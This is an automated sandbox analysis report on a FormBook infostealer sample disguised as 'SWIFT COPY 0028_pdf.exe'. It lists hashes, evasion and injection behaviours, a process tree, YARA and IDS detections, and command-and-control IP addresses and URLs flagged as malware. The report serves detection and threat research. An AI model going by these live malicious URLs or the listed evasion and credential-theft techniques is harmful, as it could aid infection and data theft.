Windows Analysis Report
SWIFT COPY 0028_pdf.exe

Overview

General Information

Sample name: SWIFT COPY 0028_pdf.exe
Analysis ID: 1559148
MD5: aa99009ff8c996ccefd78eb8a4ce1d7e
SHA1: 4061428787fa914d12ba52bc80af6c1725a2482d
SHA256: 4c16a10a2942e6a9383fc241bf4232a087333c383c5a269381300e9036c01178
Tags: exe, Formbook, user-threatcat_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SWIFT COPY 0028_pdf.exe (PID: 7088 cmdline: "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe" MD5: AA99009FF8C996CCEFD78EB8A4CE1D7E)
    • svchost.exe (PID: 6740 cmdline: "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • nBMWUKLuWlMJko.exe (PID: 2940 cmdline: "C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasautou.exe (PID: 1340 cmdline: "C:\Windows\SysWOW64\rasautou.exe" MD5: DFDBEDC2ED47CBABC13CCC64E97868F3)
          • nBMWUKLuWlMJko.exe (PID: 3320 cmdline: "C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5708 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.4613350413.0000000004B70000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2315508419.00000000049A0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.4613324935.0000000002D70000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.4613219723.0000000002D70000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.4602405101.0000000002E50000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe", CommandLine: "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe", ParentImage: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe, ParentProcessId: 7088, ParentProcessName: SWIFT COPY 0028_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe", ProcessId: 6740, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe", CommandLine: "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe", ParentImage: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe, ParentProcessId: 7088, ParentProcessName: SWIFT COPY 0028_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe", ProcessId: 6740, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-20T08:31:49.721951+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49872 | 188.114.96.3 | 80 | TCP
2024-11-20T08:32:13.073358+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49989 | 76.223.74.74 | 80 | TCP
2024-11-20T08:32:26.991329+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49994 | 163.44.185.183 | 80 | TCP
2024-11-20T08:32:40.445647+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49998 | 172.67.162.12 | 80 | TCP
2024-11-20T08:32:53.922706+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50003 | 85.159.66.93 | 80 | TCP
2024-11-20T08:33:07.603228+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50007 | 103.21.221.4 | 80 | TCP
2024-11-20T08:33:20.999361+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50011 | 188.114.96.3 | 80 | TCP
2024-11-20T08:33:34.314684+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50017 | 66.29.137.10 | 80 | TCP
2024-11-20T08:33:47.638147+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50021 | 203.161.46.205 | 80 | TCP
2024-11-20T08:34:02.362521+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50026 | 43.155.76.124 | 80 | TCP
2024-11-20T08:34:16.117357+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50030 | 103.224.182.242 | 80 | TCP
2024-11-20T08:34:29.348125+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50034 | 13.248.169.48 | 80 | TCP
2024-11-20T08:34:42.532171+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50038 | 13.248.169.48 | 80 | TCP
2024-11-20T08:34:55.824858+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50043 | 172.67.162.39 | 80 | TCP
2024-11-20T08:35:09.015592+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50047 | 13.248.169.48 | 80 | TCP
2024-11-20T08:35:22.429916+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50051 | 104.21.4.93 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-20T08:32:05.410049+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49966 | 76.223.74.74 | 80 | TCP
2024-11-20T08:32:07.970724+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49986 | 76.223.74.74 | 80 | TCP
2024-11-20T08:32:10.547590+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49987 | 76.223.74.74 | 80 | TCP
2024-11-20T08:32:19.344001+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49990 | 163.44.185.183 | 80 | TCP
2024-11-20T08:32:21.920061+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49991 | 163.44.185.183 | 80 | TCP
2024-11-20T08:32:24.442541+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49992 | 163.44.185.183 | 80 | TCP
2024-11-20T08:32:32.755875+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49995 | 172.67.162.12 | 80 | TCP
2024-11-20T08:32:35.294691+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49996 | 172.67.162.12 | 80 | TCP
2024-11-20T08:32:37.887957+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49997 | 172.67.162.12 | 80 | TCP
2024-11-20T08:32:47.094329+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49999 | 85.159.66.93 | 80 | TCP
2024-11-20T08:32:49.639800+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50000 | 85.159.66.93 | 80 | TCP
2024-11-20T08:32:52.186643+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50002 | 85.159.66.93 | 80 | TCP
2024-11-20T08:32:59.965616+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50004 | 103.21.221.4 | 80 | TCP
2024-11-20T08:33:02.486694+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50005 | 103.21.221.4 | 80 | TCP
2024-11-20T08:33:05.036604+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50006 | 103.21.221.4 | 80 | TCP
2024-11-20T08:33:13.289060+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50008 | 188.114.96.3 | 80 | TCP
2024-11-20T08:33:15.886844+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50009 | 188.114.96.3 | 80 | TCP
2024-11-20T08:33:18.423233+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50010 | 188.114.96.3 | 80 | TCP
2024-11-20T08:33:26.642780+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50014 | 66.29.137.10 | 80 | TCP
2024-11-20T08:33:29.217437+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50015 | 66.29.137.10 | 80 | TCP
2024-11-20T08:33:31.752384+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50016 | 66.29.137.10 | 80 | TCP
2024-11-20T08:33:39.962605+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50018 | 203.161.46.205 | 80 | TCP
2024-11-20T08:33:42.566078+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50019 | 203.161.46.205 | 80 | TCP
2024-11-20T08:33:45.062014+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50020 | 203.161.46.205 | 80 | TCP
2024-11-20T08:33:54.735361+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50022 | 43.155.76.124 | 80 | TCP
2024-11-20T08:33:57.273456+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50023 | 43.155.76.124 | 80 | TCP
2024-11-20T08:33:59.818741+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50025 | 43.155.76.124 | 80 | TCP
2024-11-20T08:34:08.318850+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50027 | 103.224.182.242 | 80 | TCP
2024-11-20T08:34:10.867578+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50028 | 103.224.182.242 | 80 | TCP
2024-11-20T08:34:13.497498+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50029 | 103.224.182.242 | 80 | TCP
2024-11-20T08:34:21.628824+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50031 | 13.248.169.48 | 80 | TCP
2024-11-20T08:34:24.170562+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50032 | 13.248.169.48 | 80 | TCP
2024-11-20T08:34:26.724768+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50033 | 13.248.169.48 | 80 | TCP
2024-11-20T08:34:34.903506+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50035 | 13.248.169.48 | 80 | TCP
2024-11-20T08:34:37.436227+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50036 | 13.248.169.48 | 80 | TCP
2024-11-20T08:34:39.991492+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50037 | 13.248.169.48 | 80 | TCP
2024-11-20T08:34:48.132791+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50039 | 172.67.162.39 | 80 | TCP
2024-11-20T08:34:50.723072+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50040 | 172.67.162.39 | 80 | TCP
2024-11-20T08:34:53.275913+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50041 | 172.67.162.39 | 80 | TCP
2024-11-20T08:35:01.374225+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50044 | 13.248.169.48 | 80 | TCP
2024-11-20T08:35:03.940299+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50045 | 13.248.169.48 | 80 | TCP
2024-11-20T08:35:06.479706+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50046 | 13.248.169.48 | 80 | TCP
2024-11-20T08:35:14.777692+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50048 | 104.21.4.93 | 80 | TCP
2024-11-20T08:35:17.312999+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50049 | 104.21.4.93 | 80 | TCP
2024-11-20T08:35:19.858913+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50050 | 104.21.4.93 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-20T08:32:05.410049+0100 | 2856318 | 1 | A Network Trojan was detected | 192.168.2.6 | 49966 | 76.223.74.74 | 80 | TCP

AV Detection

Source: http://www.nonpressure.beauty | Avira URL Cloud: Label: malware
Source: http://www.nonpressure.beauty/ymqd/ | Avira URL Cloud: Label: malware
Source: http://www.nonpressure.beauty/ymqd/?GR54yHZ8=mPy66x3IfJKracCH7wZR1aUAlhDvAV8zvELzb8KITnbno7Ubu3OHpx/EILO3OYxVnkt90JirtFkeXZQsCCcXJBbLSRzz4hD+Fif5IhUF/AIFPB6kYSO8O2aHFbYKqoGjWs62c28=&9xn=fHadNpk8MVax | Avira URL Cloud: Label: malware
Source: SWIFT COPY 0028_pdf.exe | ReversingLabs: Detection: 39%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.4613350413.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2315508419.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4613324935.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4613219723.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4602405101.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4613399783.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2314669018.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2316526821.0000000006480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: SWIFT COPY 0028_pdf.exe | Joe Sandbox ML: detected
Source: SWIFT COPY 0028_pdf.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nBMWUKLuWlMJko.exe, 00000003.00000002.4611840716.00000000006CE000.00000002.00000001.01000000.00000004.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4602403236.00000000006CE000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP source: SWIFT COPY 0028_pdf.exe, 00000000.00000003.2154550142.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, SWIFT COPY 0028_pdf.exe, 00000000.00000003.2153324320.0000000003940000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2315069087.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2221830371.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2315069087.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2219817771.0000000003800000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000002.4613707846.0000000004F6E000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 00000004.00000003.2322691574.0000000004A7F000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000002.4613707846.0000000004DD0000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 00000004.00000003.2326045959.0000000004C23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: SWIFT COPY 0028_pdf.exe, 00000000.00000003.2154550142.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, SWIFT COPY 0028_pdf.exe, 00000000.00000003.2153324320.0000000003940000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2315069087.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2221830371.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2315069087.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2219817771.0000000003800000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, rasautou.exe, 00000004.00000002.4613707846.0000000004F6E000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 00000004.00000003.2322691574.0000000004A7F000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000002.4613707846.0000000004DD0000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 00000004.00000003.2326045959.0000000004C23000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: rasautou.exe, 00000004.00000002.4606460151.0000000003177000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000002.4614264307.00000000053FC000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2619893356.00000000245FC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: rasautou.exe, 00000004.00000002.4606460151.0000000003177000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 00000004.00000002.4614264307.00000000053FC000.00000004.10000000.00040000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000006.00000002.4613915589.000000000321C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2619893356.00000000245FC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: rasautou.pdbGCTL source: svchost.exe, 00000002.00000002.2314913469.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2282220992.0000000003613000.00000004.00000020.00020000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000003.00000003.2252387323.000000000081B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rasautou.pdb source: svchost.exe, 00000002.00000002.2314913469.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2282220992.0000000003613000.00000004.00000020.00020000.00000000.sdmp, nBMWUKLuWlMJko.exe, 00000003.00000003.2252387323.000000000081B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_00966CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00966CA9
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_009660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_009660DD
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_009663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_009663F9
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0096EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0096EB60
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0096F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0096F5FA
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_0096F56F FindFirstFileW,FindClose, 0_2_0096F56F
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_00971B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00971B2F
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_00971C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00971C8A
Source: C:\Users\user\Desktop\SWIFT COPY 0028_pdf.exe | Code function: 0_2_00971F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00971F94
Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4_2_02E6CC00 FindFirstFileW,FindNextFileW,FindClose, 4_2_02E6CC00
Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4x nop then xor eax, eax | 4_2_02E5A080
Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4x nop then pop edi | 4_2_02E5E774
Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 4x nop then mov ebx, 00000004h | 4_2_04CC04D8

Networking

Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49872 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49966 -> 76.223.74.74:80
Source: Network traffic | Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.6:49966 -> 76.223.74.74:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49990 -> 163.44.185.183:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49991 -> 163.44.185.183:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49986 -> 76.223.74.74:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49994 -> 163.44.185.183:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49999 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49997 -> 172.67.162.12:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49989 -> 76.223.74.74:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50006 -> 103.21.221.4:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50009 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50003 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50000 -> 85.159.66.93:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:50021 -> 203.161.46.205:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50019 -> 203.161.46.205:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49992 -> 163.44.185.183:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50031 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50022 -> 43.155.76.124:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50025 -> 43.155.76.124:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50035 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50005 -> 103.21.221.4:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49995 -> 172.67.162.12:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50032 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50029 -> 103.224.182.242:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50033 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49987 -> 76.223.74.74:80
